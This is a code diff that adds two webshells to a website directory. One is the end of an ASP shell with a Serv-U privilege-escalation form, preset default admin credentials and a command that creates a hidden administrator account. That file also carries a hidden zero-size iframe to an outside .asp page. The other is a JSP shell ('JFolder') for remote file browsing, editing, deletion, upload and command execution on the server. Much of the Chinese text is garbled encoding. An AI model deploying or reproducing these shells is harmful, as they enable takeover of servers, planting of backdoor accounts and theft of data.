+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"downloads":downloads()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"</body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>" 
+%></body></html>
+</body></html>
+</body></html>
+
diff --git a/www-7jyewu-cn/非常牛逼的Jsp大马.jsp b/www-7jyewu-cn/非常牛逼的Jsp大马.jsp
new file mode 100644
index 0000000..e63c96a
--- /dev/null
+++ b/www-7jyewu-cn/非常牛逼的Jsp大马.jsp
@@ -0,0 +1,994 @@
+<%
+/**
+JFolder V0.9  windows platform
+@Filename�� JFolder.jsp 
+@Description�� һ���򵥵�ϵͳ�ļ�Ŀ¼��ʾ������������Դ���������ṩ�������ļ��������������ܽ�����
+
+@Bugs  :  ����ʱ�������ļ����޷�������ʾ
+*/
+%>
+<%@ page contentType="text/html;charset=gb2312"%>
+<%@page import="java.io.*,java.util.*,java.net.*" %>
+<%!
+private final static int languageNo=0; //���԰汾��0 : ���ģ� 1��Ӣ��
+String strThisFile="JFolder.jsp";
+String[] authorInfo={" <font color=red> ��������-ר�ð� </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.7jyewu.cn </font>"};
+String[] strFileManage   = {"�� �� �� ��","File Management"};
+String[] strCommand      = {"CMD �� ��","Command Window"};
+String[] strSysProperty  = {"ϵ ͳ �� ��","System Property"};
+String[] strHelp         = {"�� ��","Help"};
+String[] strParentFolder = {"�ϼ�Ŀ¼","Parent Folder"};
+String[] strCurrentFolder= {"��ǰĿ¼","Current Folder"};
+String[] strDrivers      = {"������","Drivers"};
+String[] strFileName     = {"�ļ�����","File Name"};
+String[] strFileSize     = {"�ļ���С","File Size"};
+String[] strLastModified = {"����޸�","Last Modified"};
+String[] strFileOperation= {"�ļ�����","Operations"};
+String[] strFileEdit     = {"�޸�","Edit"};
+String[] strFileDown     = {"����","Download"};
+String[] strFileCopy     = {"����","Move"};
+String[] strFileDel      = {"ɾ��","Delete"};
+String[] strExecute      = {"ִ��","Execute"};
+String[] strBack         = {"����","Back"};
+String[] strFileSave     = {"����","Save"};
+
+public class FileHandler
+{
+ private String strAction="";
+ private String strFile="";
+ void FileHandler(String action,String f)
+ {
+ 
+ }
+}
+
+public static class UploadMonitor {
+
+  static Hashtable uploadTable = new Hashtable();
+
+  static void set(String fName, UplInfo info) {
+   uploadTable.put(fName, info);
+  }
+
+  static void remove(String fName) {
+   uploadTable.remove(fName);
+  }
+
+  static UplInfo getInfo(String fName) {
+   UplInfo info = (UplInfo) uploadTable.get(fName);
+   return info;
+  }
+}
+
+public class UplInfo {
+
+  public long totalSize;
+  public long currSize;
+  public long starttime;
+  public boolean aborted;
+
+  public UplInfo() {
+   totalSize = 0l;
+   currSize = 0l;
+   starttime = System.currentTimeMillis();
+   aborted = false;
+  }
+
+  public UplInfo(int size) {
+   totalSize = size;
+   currSize = 0;
+   starttime = System.currentTimeMillis();
+   aborted = false;
+  }
+
+  public String getUprate() {
+   long time = System.currentTimeMillis() - starttime;
+   if (time != 0) {
+    long uprate = currSize * 1000 / time;
+    return convertFileSize(uprate) + "/s";
+   }
+   else return "n/a";
+  }
+
+  public int getPercent() {
+   if (totalSize == 0) return 0;
+   else return (int) (currSize * 100 / totalSize);
+  }
+
+  public String getTimeElapsed() {
+   long time = (System.currentTimeMillis() - starttime) / 1000l;
+   if (time - 60l >= 0){
+    if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+    else return time / 60 + ":0" + (time % 60) + "m";
+   }
+   else return time<10 ? "0" + time + "s": time + "s";
+  }
+
+  public String getTimeEstimated() {
+   if (currSize == 0) return "n/a";
+   long time = System.currentTimeMillis() - starttime;
+   time = totalSize * time / currSize;
+   time /= 1000l;
+   if (time - 60l >= 0){
+    if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+    else return time / 60 + ":0" + (time % 60) + "m";
+   }
+   else return time<10 ? "0" + time + "s": time + "s";
+  }
+
+ }
+
+ public class FileInfo {
+
+  public String name = null, clientFileName = null, fileContentType = null;
+  private byte[] fileContents = null;
+  public File file = null;
+  public StringBuffer sb = new StringBuffer(100);
+
+  public void setFileContents(byte[] aByteArray) {
+   fileContents = new byte[aByteArray.length];
+   System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+  }
+}
+
+// A Class with methods used to process a ServletInputStream
+public class HttpMultiPartParser {
+
+  private final String lineSeparator = System.getProperty("line.separator", "\n");
+  private final int ONE_MB = 1024 * 1;
+
+  public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+    int clength) throws IllegalArgumentException, IOException {
+   if (is == null) throw new IllegalArgumentException("InputStream");
+   if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+     "\"" + boundary + "\" is an illegal boundary indicator");
+   boundary = "--" + boundary;
+   StringTokenizer stLine = null, stFields = null;
+   FileInfo fileInfo = null;
+   Hashtable dataTable = new Hashtable(5);
+   String line = null, field = null, paramName = null;
+   boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+   boolean isFile = false;
+   if (saveFiles) { // Create the required directory (including parent dirs)
+    File f = new File(saveInDir);
+    f.mkdirs();
+   }
+   line = getLine(is);
+   if (line == null || !line.startsWith(boundary)) throw new IOException(
+     "Boundary not found; boundary = " + boundary + ", line = " + line);
+   while (line != null) {
+    if (line == null || !line.startsWith(boundary)) return dataTable;
+    line = getLine(is);
+    if (line == null) return dataTable;
+    stLine = new StringTokenizer(line, ";\r\n");
+    if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+      "Bad data in second line");
+    line = stLine.nextToken().toLowerCase();
+    if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+      "Bad data in second line");
+    stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+    if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+      "Bad data in second line");
+    fileInfo = new FileInfo();
+    stFields.nextToken();
+    paramName = stFields.nextToken();
+    isFile = false;
+    if (stLine.hasMoreTokens()) {
+     field = stLine.nextToken();
+     stFields = new StringTokenizer(field, "=\"");
+     if (stFields.countTokens() > 1) {
+      if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+       fileInfo.name = paramName;
+       String value = stFields.nextToken();
+       if (value != null && value.trim().length() > 0) {
+        fileInfo.clientFileName = value;
+        isFile = true;
+       }
+       else {
+        line = getLine(is); // Skip "Content-Type:" line
+        line = getLine(is); // Skip blank line
+        line = getLine(is); // Skip blank line
+        line = getLine(is); // Position to boundary line
+        continue;
+       }
+      }
+     }
+     else if (field.toLowerCase().indexOf("filename") >= 0) {
+      line = getLine(is); // Skip "Content-Type:" line
+      line = getLine(is); // Skip blank line
+      line = getLine(is); // Skip blank line
+      line = getLine(is); // Position to boundary line
+      continue;
+     }
+    }
+    boolean skipBlankLine = true;
+    if (isFile) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+     if (line.trim().length() < 1) skipBlankLine = false;
+     else {
+      stLine = new StringTokenizer(line, ": ");
+      if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+        "Bad data in third line");
+      stLine.nextToken(); // Content-Type
+      fileInfo.fileContentType = stLine.nextToken();
+     }
+    }
+if (skipBlankLine) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+    }
+    if (!isFile) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+     dataTable.put(paramName, line);
+     // If parameter is dir, change saveInDir to dir
+     if (paramName.equals("dir")) saveInDir = line;
+     line = getLine(is);
+     continue;
+    }
+    try {
+     UplInfo uplInfo = new UplInfo(clength);
+     UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+     OutputStream os = null;
+     String path = null;
+     if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+       fileInfo.clientFileName));
+     else os = new ByteArrayOutputStream(ONE_MB);
+     boolean readingContent = true;
+     byte previousLine[] = new byte[2 * ONE_MB];
+     byte temp[] = null;
+     byte currentLine[] = new byte[2 * ONE_MB];
+     int read, read3;
+     if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+      line = null;
+      break;
+     }
+     while (readingContent) {
+      if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+       line = null;
+       uplInfo.aborted = true;
+       break;
+      }
+      if (compareBoundary(boundary, currentLine)) {
+       os.write(previousLine, 0, read - 2);
+       line = new String(currentLine, 0, read3);
+       break;
+      }
+      else {
+       os.write(previousLine, 0, read);
+       uplInfo.currSize += read;
+       temp = currentLine;
+       currentLine = previousLine;
+       previousLine = temp;
+       read = read3;
+      }//end else
+     }//end while
+     os.flush();
+     os.close();
+     if (!saveFiles) {
+      ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+      fileInfo.setFileContents(baos.toByteArray());
+     }
+     else fileInfo.file = new File(path);
+     dataTable.put(paramName, fileInfo);
+     uplInfo.currSize = uplInfo.totalSize;
+    }//end try
+    catch (IOException e) {
+     throw e;
+    }
+   }
+   return dataTable;
+  }
+
+  /**
+   * Compares boundary string to byte array
+   */
+  private boolean compareBoundary(String boundary, byte ba[]) {
+   byte b;
+   if (boundary == null || ba == null) return false;
+   for (int i = 0; i < boundary.length(); i++)
+    if ((byte) boundary.charAt(i) != ba[i]) return false;
+   return true;
+  }
+
+  /** Convenience method to read HTTP header lines */
+  private synchronized String getLine(ServletInputStream sis) throws IOException {
+   byte b[] = new byte[1024];
+   int read = sis.readLine(b, 0, b.length), index;
+   String line = null;
+   if (read != -1) {
+    line = new String(b, 0, read);
+    if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+   }
+   return line;
+  }
+
+  public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+   String path = null;
+   if (dir == null || fileName == null) throw new IllegalArgumentException(
+     "dir or fileName is null");
+   int index = fileName.lastIndexOf('/');
+   String name = null;
+   if (index >= 0) name = fileName.substring(index + 1);
+   else name = fileName;
+   index = name.lastIndexOf('\\');
+   if (index >= 0) fileName = name.substring(index + 1);
+   path = dir + File.separator + fileName;
+   if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+   else return path.replace('/', File.separatorChar);
+  }
+} //End of class HttpMultiPartParser
+
+String formatPath(String p)
+{
+ StringBuffer sb=new StringBuffer();
+ for (int i = 0; i < p.length(); i++) 
+ {
+  if(p.charAt(i)=='\\')
+  {
+   sb.append("\\\\");
+  }
+  else
+  {
+   sb.append(p.charAt(i));
+  }
+ }
+ return sb.toString();
+}
+
+ /**
+  * Converts some important chars (int) to the corresponding html string
+  */
+ static String conv2Html(int i) {
+  if (i == '&') return "&amp;";
+  else if (i == '<') return "&lt;";
+  else if (i == '>') return "&gt;";
+  else if (i == '"') return "&quot;";
+  else return "" + (char) i;
+ }
+
+ /**
+  * Converts a normal string to a html conform string
+  */
+ static String htmlEncode(String st) {
+  StringBuffer buf = new StringBuffer();
+  for (int i = 0; i < st.length(); i++) {
+   buf.append(conv2Html(st.charAt(i)));
+  }
+  return buf.toString();
+ }
+String getDrivers()
+/**
+Windowsϵͳ��ȡ�ÿ��õ������߼���
+*/
+{
+ StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
+ File roots[]=File.listRoots();
+ for(int i=0;i<roots.length;i++)
+ {
+  sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
+  sb.append(roots[i]+"</a>&nbsp;");
+ }
+ return sb.toString();
+}
+static String convertFileSize(long filesize)
+{
+ //bug 5.09M ��ʾ5.9M
+ String strUnit="Bytes";
+ String strAfterComma="";
+ int intDivisor=1;
+ if(filesize>=1024*1024)
+ {
+  strUnit = "MB";
+  intDivisor=1024*1024;
+ }
+ else if(filesize>=1024)
+ {
+  strUnit = "KB";
+  intDivisor=1024;
+ }
+ if(intDivisor==1) return filesize + " " + strUnit;
+ strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
+ if(strAfterComma=="") strAfterComma=".0";
+ return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
+}
+%>
+<%
+request.setCharacterEncoding("gb2312");
+String tabID = request.getParameter("tabID");
+String strDir = request.getParameter("path");
+String strAction = request.getParameter("action");
+String strFile = request.getParameter("file");
+String strPath = strDir + "\\" + strFile; 
+String strCmd = request.getParameter("cmd");
+StringBuffer sbEdit=new StringBuffer("");
+StringBuffer sbDown=new StringBuffer("");
+StringBuffer sbCopy=new StringBuffer("");
+StringBuffer sbSaveCopy=new StringBuffer("");
+StringBuffer sbNewFile=new StringBuffer("");
+
+if((tabID==null) || tabID.equals(""))
+{
+ tabID = "1";
+}
+
+if(strDir==null||strDir.length()<1)
+{
+ strDir = request.getRealPath("/");
+}
+
+
+if(strAction!=null && strAction.equals("down"))
+{
+ File f=new File(strPath);
+ if(f.length()==0)
+ {
+  sbDown.append("�ļ���СΪ 0 �ֽڣ��Ͳ������˰�");
+ }
+ else
+ {
+  response.setHeader("content-type","text/html; charset=ISO-8859-1");
+  response.setContentType("APPLICATION/OCTET-STREAM"); 
+  response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
+  FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
+  out.clearBuffer();
+  int i;
+  while ((i=fileInputStream.read()) != -1)
+  {
+   out.write(i); 
+  }
+  fileInputStream.close();
+  out.close();
+ }
+}
+
+if(strAction!=null && strAction.equals("del"))
+{
+ File f=new File(strPath);
+ f.delete();
+}
+
+if(strAction!=null && strAction.equals("edit"))
+{
+ File f=new File(strPath); 
+ BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
+ sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
+ sbEdit.append("<input type=hidden name=action value=save >\r\n");
+ sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
+ sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
+ sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
+ sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
+ sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
+ String line="";
+ while((line=br.readLine())!=null)
+ {
+  sbEdit.append(htmlEncode(line)+"\r\n");  
+ }
+   sbEdit.append("</textarea>");
+ sbEdit.append("<input type=hidden name=path value="+strDir+">");
+ sbEdit.append("</form>");
+}
+
+if(strAction!=null && strAction.equals("save"))
+{
+ File f=new File(strPath);
+ BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
+ String strContent=request.getParameter("content");
+ bw.write(strContent);
+ bw.close();
+}
+if(strAction!=null && strAction.equals("copy"))
+{
+ File f=new File(strPath);
+ sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
+ sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
+ sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
+ sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
+ sbCopy.append("ԭʼ�ļ��� "+strPath+"<p>");
+ sbCopy.append("Ŀ���ļ��� <input type=text name=file2 size=40 value='"+strDir+"'><p>");
+ sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
+ sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
+ sbCopy.append("</form>");
+}
+if(strAction!=null && strAction.equals("savecopy"))
+{
+ File f=new File(strPath);
+ String strDesFile=request.getParameter("file2");
+ if(strDesFile==null || strDesFile.equals(""))
+ {
+  sbSaveCopy.append("<p><font color=red>Ŀ���ļ�����</font>");
+ }
+ else
+ {
+  File f_des=new File(strDesFile);
+  if(f_des.isFile())
+  {
+   sbSaveCopy.append("<p><font color=red>Ŀ���ļ��Ѵ���,���ܸ��ơ�</font>");
+  }
+  else
+  {
+   String strTmpFile=strDesFile;
+   if(f_des.isDirectory())
+   {
+    if(!strDesFile.endsWith("\\"))
+    {
+     strDesFile=strDesFile+"\\";
+    }
+    strTmpFile=strDesFile+"cqq_"+strFile;
+    }
+   
+   File f_des_copy=new File(strTmpFile);
+   FileInputStream in1=new FileInputStream(f);
+   FileOutputStream out1=new FileOutputStream(f_des_copy);
+   byte[] buffer=new byte[1024];
+   int c;
+   while((c=in1.read(buffer))!=-1)
+   {
+    out1.write(buffer,0,c);
+   }
+   in1.close();
+   out1.close();
+ 
+   sbSaveCopy.append("ԭʼ�ļ� ��"+strPath+"<p>");
+   sbSaveCopy.append("Ŀ���ļ� ��"+strTmpFile+"<p>");
+   sbSaveCopy.append("<font color=red>���Ƴɹ���</font>");   
+  }  
+ } 
+ sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=����>");
+}
+if(strAction!=null && strAction.equals("newFile"))
+{
+ String strF=request.getParameter("fileName");
+ String strType1=request.getParameter("btnNewFile");
+ String strType2=request.getParameter("btnNewDir");
+ String strType="";
+ if(strType1==null)
+ {
+  strType="Dir";
+ }
+ else if(strType2==null)
+ {
+  strType="File";
+ }
+ if(!strType.equals("") && !(strF==null || strF.equals("")))
+ {  
+   File f_new=new File(strF);   
+   if(strType.equals("File") && !f_new.createNewFile())
+    sbNewFile.append(strF+" �ļ�����ʧ��");
+   if(strType.equals("Dir") && !f_new.mkdirs())
+    sbNewFile.append(strF+" Ŀ¼����ʧ��");
+ }
+ else
+ {
+  sbNewFile.append("<p><font color=red>�����ļ���Ŀ¼������</font>");
+ }
+}
+
+if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
+{
+ String tempdir=".";
+ boolean error=false;
+ response.setContentType("text/html");
+ sbNewFile.append("<p><font color=red>�����ļ���Ŀ¼������</font>");
+ HttpMultiPartParser parser = new HttpMultiPartParser();
+
+ int bstart = request.getContentType().lastIndexOf("oundary=");
+ String bound = request.getContentType().substring(bstart + 8);
+ int clength = request.getContentLength();
+ Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
+ if (ht.get("cqqUploadFile") != null)
+ {
+
+  FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
+  File f1 = fi.file;
+  UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+  if (info != null && info.aborted) 
+  {
+   f1.delete();
+   request.setAttribute("error", "Upload aborted");
+  }
+  else 
+  {
+   String path = (String) ht.get("path");
+   if(path!=null && !path.endsWith("\\")) 
+    path = path + "\\";
+   if (!f1.renameTo(new File(path + f1.getName()))) 
+   {
+    request.setAttribute("error", "Cannot upload file.");
+    error = true;
+    f1.delete();
+   }
+  }
+ }
+}
+%>
+<html>
+<head>
+<style type="text/css">
+td,select,input,body{font-size:9pt;}
+A { TEXT-DECORATION: none }
+
+#tablist{
+padding: 5px 0;
+margin-left: 0;
+margin-bottom: 0;
+margin-top: 0.1em;
+font:9pt;
+}
+
+#tablist li{
+list-style: none;
+display: inline;
+margin: 0;
+}
+
+#tablist li a{
+padding: 3px 0.5em;
+margin-left: 3px;
+border: 1px solid ;
+background: F6F6F6;
+}
+
+#tablist li a:link, #tablist li a:visited{
+color: navy;
+}
+
+#tablist li a.current{
+background: #EAEAFF;
+}
+
+#tabcontentcontainer{
+width: 100%;
+padding: 5px;
+border: 1px solid black;
+}
+
+.tabcontent{
+display:none;
+}
+
+</style>
+
+<script type="text/javascript">
+
+var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
+
+////////Stop editting////////////////
+
+function cascadedstyle(el, cssproperty, csspropertyNS){
+if (el.currentStyle)
+return el.currentStyle[cssproperty]
+else if (window.getComputedStyle){
+var elstyle=window.getComputedStyle(el, "")
+return elstyle.getPropertyValue(csspropertyNS)
+}
+}
+
+var previoustab=""
+
+function expandcontent(cid, aobject){
+if (document.getElementById){
+highlighttab(aobject)
+if (previoustab!="")
+document.getElementById(previoustab).style.display="none"
+document.getElementById(cid).style.display="block"
+previoustab=cid
+if (aobject.blur)
+aobject.blur()
+return false
+}
+else
+return true
+}
+
+function highlighttab(aobject){
+if (typeof tabobjlinks=="undefined")
+collecttablinks()
+for (i=0; i<tabobjlinks.length; i++)
+tabobjlinks[i].style.backgroundColor=initTabcolor
+var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
+aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
+}
+
+function collecttablinks(){
+var tabobj=document.getElementById("tablist")
+tabobjlinks=tabobj.getElementsByTagName("A")
+}
+
+function do_onload(){
+collecttablinks()
+initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
+initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
+expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
+}
+
+if (window.addEventListener)
+window.addEventListener("load", do_onload, false)
+else if (window.attachEvent)
+window.attachEvent("onload", do_onload)
+else if (document.getElementById)
+window.onload=do_onload
+
+ 
+
+</script>
+<script language="javascript">
+
+function doForm(action,path,file,cmd,tab,content)
+{
+ document.frmCqq.action.value=action;
+ document.frmCqq.path.value=path;
+ document.frmCqq.file.value=file;
+ document.frmCqq.cmd.value=cmd;
+ document.frmCqq.tabID.value=tab;
+ document.frmCqq.content.value=content;
+ if(action=="del")
+ {
+  if(confirm("ȷ��Ҫɾ���ļ� "+file+" ��"))
+  document.frmCqq.submit();
+ }
+ else
+ {
+  document.frmCqq.submit();    
+ }
+}
+</script>
+
+<title>JSP Shell ��������ר�ð汾</title>
+<head>
+
+
+<body>
+
+<form name="frmCqq" method="post" action="">
+<input type="hidden" name="action" value="">
+<input type="hidden" name="path" value="">
+<input type="hidden" name="file" value="">
+<input type="hidden" name="cmd" value="">
+<input type="hidden" name="tabID" value="2">
+<input type="hidden" name="content" value="">
+</form>
+
+<!--Top Menu Started-->
+<ul id="tablist">
+<li><a href="http://www.7jyewu.cn" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
+<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
+<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
+<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
+ &nbsp; <%=authorInfo[languageNo]%>
+</ul>
+<!--Top Menu End-->
+
+
+<%
+StringBuffer sbFolder=new StringBuffer("");
+StringBuffer sbFile=new StringBuffer("");
+try
+{
+ File objFile = new File(strDir);
+ File list[] = objFile.listFiles(); 
+ if(objFile.getAbsolutePath().length()>3)
+ {
+  sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
+  sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
+
+
+ }
+ for(int i=0;i<list.length;i++)
+ {
+  if(list[i].isDirectory())
+  {
+   sbFolder.append("<tr><td >&nbsp;</td><td>");
+   sbFolder.append("  <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
+   sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
+  }
+  else
+  {
+      String strLen="";
+   String strDT="";
+   long lFile=0;
+   lFile=list[i].length();
+   strLen = convertFileSize(lFile);
+   Date dt=new Date(list[i].lastModified());
+   strDT=dt.toLocaleString();
+   sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
+   sbFile.append(""+list[i].getName()); 
+   sbFile.append("</td><td>");
+   sbFile.append(""+strLen);
+   sbFile.append("</td><td>");
+   sbFile.append(""+strDT);
+   sbFile.append("</td><td>");
+
+   sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileEdit[languageNo]+"</a> ");
+
+   sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileDel[languageNo]+"</a> ");
+
+   sbFile.append("  &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileDown[languageNo]+"</a> ");
+
+   sbFile.append("  &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileCopy[languageNo]+"</a> ");
+  }  
+
+ } 
+}
+catch(Exception e)
+{
+ out.println("<font color=red>����ʧ�ܣ� "+e.toString()+"</font>");
+}
+%>
+
+<DIV id="tabcontentcontainer">
+
+
+<div id="menu3" class="tabcontent">
+<br> 
+<br> &nbsp;&nbsp; ��
+<br> 
+<br>&nbsp;
+
+</div>
+
+<div id="menu4" class="tabcontent">
+<br>
+<p>һ������˵��</p>
+<p>&nbsp;&nbsp;&nbsp; jsp �汾���ļ���������ͨ���ó������Զ�̹����������ϵ��ļ�ϵͳ���������½����޸ġ�</p>
+<p>ɾ���������ļ���Ŀ¼������windowsϵͳ�����ṩ�������д��ڵĹ��ܣ���������һЩ��������</p>
+<p>��windows��cmd��</p>
+<p>&nbsp;</p>
+<p>��������</p>
+<p>&nbsp;&nbsp;&nbsp;<b>������ʹ�ù����У����κ����⣬������߽��鶼���Ը������ԣ��Ա�ʹ�������������ƺ��ȶ���<p>
+���Ե�ַΪ��<a href="http://www.7jyewu.cn" target="_blank">http://www.7jyewu.cn/</a></b>
+<p>&nbsp;</p>
+<p>�������¼�¼</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9���԰淢����������һЩ�����Ĺ��ܣ��ļ��༭�����ơ�ɾ�������ء��ϴ��Լ��½��ļ�Ŀ¼����</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; ��ʱ��Ϊ0.6��ɣ� �ṩ��Ŀ¼�ļ�������� �� cmd����</p>
